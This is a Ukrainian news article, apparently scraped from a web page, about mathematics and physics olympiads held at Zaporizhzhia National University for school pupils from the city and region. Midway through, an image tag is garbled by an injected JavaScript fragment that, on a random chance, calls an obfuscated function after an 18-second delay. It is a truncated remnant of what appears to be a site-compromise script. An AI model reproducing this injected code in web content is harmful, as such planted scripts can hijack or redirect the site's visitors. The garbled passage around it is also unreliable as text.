У ЗНУ провели олімпіади з математики й фізики для старшокласників Запоріжжя й області

0

Захід зібрав у ЗНУ учнів 7-11 класів закладів загальної середньої освіти Запоріжжя й Запорізької області. Подібна практика стала вже традиційною для викладачів вишу. Загалом, за даними організаторів, участь в олімпіадах взяли більше сотні учнів. Серед зареєстрованих учасників були представники закладів середньої освіти м. Запоріжжя та Запорізької області. При цьому, найбільша кількість учасників із Мелітопольського, Бердянського, Василівського району.

andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anda-zhuri-olimpiadi-z-fiziki.jpg» alt=»» width=»1200″ height=»900″ />
За словами завідувача кафедри загальної математики ЗНУ, к.ф.-м.н., заступника голови журі Ігоря Зіновєєва, представники математичного факультету й керівництво університету виступили з ініціативою проведення цієї олімпіади з повним методичним забезпеченням завдань. Так, до складу журі олімпіади залучили провідних викладачів кафедри загальної математики та кафедри фундаментальної математики ЗНУ, фахівців у галузі олімпіадної математики, студентів-волонтерів, які мають досвід змагань на математичних олімпіадах, турнірах не нижче всеукраїнського етапу (це – 4 етап, міжнародний етап, відбір на міжнародні олімпіади з математики).
Також під час проведення олімпіади з фізики у двох аудиторіях, куди розмістили після загального зібрання учасників заходу, були присутні помічники інструкторів – студенти спеціальності «Середня освіта (Фізика)» математичного факультету, які допомагали організовувати роботу школярів. Вони роздали матеріали для тестувань, а також слідкували за порядком в аудиторії.
Організатори відзначили високий рівень роботи всіх представників ЗНУ, задіяних у проведенні олімпіади. Зокрема, вони висловили вдячність викладачам-членам журі та студентам – помічникам інструкторів, які допомогли організувати роботу учасників олімпіади. Аналізуючи особливості проведення олімпіади, її організатори відзначають, що учні відповідально поставилися до підготовки: відчутно було їхнє позитивне налаштування, адже олімпіадні змагання – це можливість продемонструвати свої аналітичні здібності та фахові знання.
Відеосюжет:

ОСТАВЬТЕ ОТВЕТ

Пожалуйста, введите ваш комментарий!
пожалуйста, введите ваше имя здесь